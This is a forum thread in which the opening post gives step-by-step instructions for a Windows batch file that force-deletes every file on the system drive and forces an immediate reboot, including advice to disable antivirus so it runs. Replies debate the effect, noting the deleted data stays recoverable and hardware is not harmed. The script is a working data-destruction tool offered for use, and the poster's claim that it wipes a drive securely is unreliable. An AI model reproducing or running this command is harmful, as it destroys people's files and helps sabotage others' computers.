What's new

How to destroy a computer with code

  • Thread starter Phiction
  • Start date
  • Views 46,192
Phiction

Phiction

Enthusiast
Messages
206
Reaction score
21
Points
70
Sin$
7
WARNING DO NOT DO THIS TO ANY COMPUTER YOU DO NOT WISH TO DESTROY
I AM NOT RESPONSIBLE FOR ANY DAMAGE YOU DO TO ANYONE'S COMPUTER

How To Do:
1)
Open Up Notepad (Start/All Programs/ Accessories/ Notepad)
2)
Copy And Paste This Code Into Notepad

Code:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

3)
On NotePad : Goto File, Save As, Save it anywhere, Name The File : (whatever).bat, .bat stands for batch.
4)
Locate the File Wherever You Saved It, And Open It. (If It Doesn't Open, Or Is Not There, Turn Off Your Anti Virus.)
5)
A Cmd Window Should Pop Up Let It Run To The End, And After Its Done Restart Your Computer. And Thats It.

AGAIN DONT DO THIS TO ANY COMPUTER THATS NOT YOURS OR YOU DONT WANT IT BROKEN~!
 
GoldBl4d3

GoldBl4d3

VIP
VIP
Retired
Programmer Mythical Veteran Legendary Veteran
Messages
3,785
Reaction score
1,452
Points
600
Sin$
0
Kinda pointless! No one would do it, nor do they have a purpose to do it.
 
Phiction

Phiction

Enthusiast
Messages
206
Reaction score
21
Points
70
Sin$
7
Kinda pointless! No one would do it, nor do they have a purpose to do it.
Well, Ive used it once on my old computer. It just deletes your harddrive. I mean say you have an old laptop, and you dont want anyone to see your stuff, just use this, and then throw it away. :tongue:
 
GoldBl4d3

GoldBl4d3

VIP
VIP
Retired
Programmer Mythical Veteran Legendary Veteran
Messages
3,785
Reaction score
1,452
Points
600
Sin$
0
Well, Ive used it once on my old computer. It just deletes your harddrive. I mean say you have an old laptop, and you dont want anyone to see your stuff, just use this, and then throw it away. :tongue:

I guess. But if I ever get rid of my laptop. I will be sure to pull the HDD and memory out of it for keeps.
 
Fire30

Fire30

Seasoned Member
Messages
7,222
Reaction score
2,364
Points
635
Sin$
0
Well, Ive used it once on my old computer. It just deletes your harddrive. I mean say you have an old laptop, and you dont want anyone to see your stuff, just use this, and then throw it away. :tongue:

If you think people can't get all your data because of this batchfile you are sorely mistaken.
 
GoldBl4d3

GoldBl4d3

VIP
VIP
Retired
Programmer Mythical Veteran Legendary Veteran
Messages
3,785
Reaction score
1,452
Points
600
Sin$
0
Damn I was just about to say you can recover your hdd data. In fact I have an app to do so for when I accidentally delete something.
 
Zorg93

NayJames123

Read Art
Fabled Veteran Modder Programmer
Messages
4,273
Reaction score
3,475
Points
650
Sin$
0
think you would need something to fully format your harddrive instead, all this does is make the drive think there isnt any data located the sectors that used to have all the files, so programs can still look inside and see the plain data and work with that.
and this doesnt destroy a computer, it just means you'll need to restore it from a backup partition or a recovery disc
 
GoldBl4d3

GoldBl4d3

VIP
VIP
Retired
Programmer Mythical Veteran Legendary Veteran
Messages
3,785
Reaction score
1,452
Points
600
Sin$
0
think you would need something to fully format your harddrive instead, all this does is make the drive think there isnt any data located the sectors that used to have all the files, so programs can still look inside and see the plain data and work with that.
and this doesnt destroy a computer, it just means you'll need to restore it from a backup partition or a recovery disc

im pretty sure by destroy he meant just ruin someones day by deleting the hdd
 
Zorg93

NayJames123

Read Art
Fabled Veteran Modder Programmer
Messages
4,273
Reaction score
3,475
Points
650
Sin$
0
im pretty sure by destroy he meant just ruin someones day by deleting the hdd
yeah, unless you create code that can somehow alter the bios and overclock the cpu etc, i doubt you could destroy a computer using batch files
 
Phiction

Phiction

Enthusiast
Messages
206
Reaction score
21
Points
70
Sin$
7
yeah, unless you create code that can somehow alter the bios and overclock the cpu etc, i doubt you could destroy a computer using batch files
Well if im correct about this, is once the CPU hits a High enough TEMP, it turns off the computer, so it wont damage the CPU. But that might not be the case for older computers.
 
Top Bottom
Login
Register